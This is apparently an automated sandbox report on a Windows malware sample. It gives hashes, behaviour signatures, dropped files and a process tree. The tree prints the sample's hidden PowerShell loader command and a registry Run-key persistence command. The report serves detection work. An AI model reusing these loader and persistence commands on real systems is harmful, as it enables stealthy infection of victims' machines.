Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    27/07/2024, 06:05

General

  • Target

    f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe

  • Size

    1.2MB

  • MD5

    a4c6a296a5b55a2858c0343d2c44490b

  • SHA1

    01c57919f82cf0ec9683540735141302032ac070

  • SHA256

    f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4

  • SHA512

    0bd26eb1250c24b3b0ea5938c17d71dcf9b7467fc85588e8b13978e8d06aaa6e34dd276ebb67c4455e2a8db4458d487c8bde54c7a0cf4bed2e54a323194ef13f

  • SSDEEP

    24576:PZbqxGFMhCGa7cQPHpk060aci6V20XH83oD1dEUu28KkzFu7biF8:RbqxGFMhCGa7cQkJciMvMXLFgbi2

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe
    "C:\Users\Admin\AppData\Local\Temp\f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$galdens=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Labourhoods.Mas';$beboerhusene=$galdens.SubString(2416,3);.$beboerhusene($galdens)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Users\Admin\AppData\Local\Temp\Skankemageren.exe
        "C:\Users\Admin\AppData\Local\Temp\Skankemageren.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%sekundrfilens% -windowstyle minimized $Seismologue=(Get-ItemProperty -Path 'HKCU:\Ceration48\').Openheartedness0;%sekundrfilens% ($Seismologue)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%sekundrfilens% -windowstyle minimized $Seismologue=(Get-ItemProperty -Path 'HKCU:\Ceration48\').Openheartedness0;%sekundrfilens% ($Seismologue)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:2416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Labourhoods.Mas

    Filesize

    51KB

    MD5

    edef981795fb6272025d069c64f98d9e

    SHA1

    665b7096bbd7c215bcf9c22e08e4148ae1eb7f9d

    SHA256

    f3b691cb8a7d661732bdd82f35cbe5cc2ed99fedc6992646803e871d221e9e37

    SHA512

    eff41508448d5949e79a3fa951006d28fe822364a72029f59e5f493cd9c59252dc02116c4777aeb5a2e389c075c43651e6198b713239f69f692c89aaa7ade583

  • C:\Users\Admin\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Monoerne.Ple

    Filesize

    342KB

    MD5

    b75ebbcb5d2f614b0a9e050c93cdb838

    SHA1

    0ca8fd75e51890798ae01761532627d46c89ddd5

    SHA256

    08ddca57d81a3aa14a1ec07e0beede85bfb8104014d67cc8a2332be5a091abcb

    SHA512

    76fb2fde501d5d89edf279796f0ae6ef8f88dd42e07e759614f49008a46639ad848df3db5acc4e9ebd2002a7e02b6303935871a0d66f351d293229ecb4ab5371

  • \Users\Admin\AppData\Local\Temp\Skankemageren.exe

    Filesize

    1.2MB

    MD5

    a4c6a296a5b55a2858c0343d2c44490b

    SHA1

    01c57919f82cf0ec9683540735141302032ac070

    SHA256

    f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4

    SHA512

    0bd26eb1250c24b3b0ea5938c17d71dcf9b7467fc85588e8b13978e8d06aaa6e34dd276ebb67c4455e2a8db4458d487c8bde54c7a0cf4bed2e54a323194ef13f

  • memory/2812-25-0x00000000004C0000-0x0000000001522000-memory.dmp

    Filesize

    16.4MB

  • memory/2900-15-0x0000000074310000-0x00000000748BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2900-12-0x0000000074310000-0x00000000748BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2900-8-0x0000000074311000-0x0000000074312000-memory.dmp

    Filesize

    4KB

  • memory/2900-11-0x0000000074310000-0x00000000748BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2900-17-0x0000000074310000-0x00000000748BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2900-18-0x0000000006850000-0x00000000094D3000-memory.dmp

    Filesize

    44.5MB

  • memory/2900-19-0x0000000074310000-0x00000000748BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2900-10-0x0000000074310000-0x00000000748BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2900-9-0x0000000074310000-0x00000000748BB000-memory.dmp

    Filesize

    5.7MB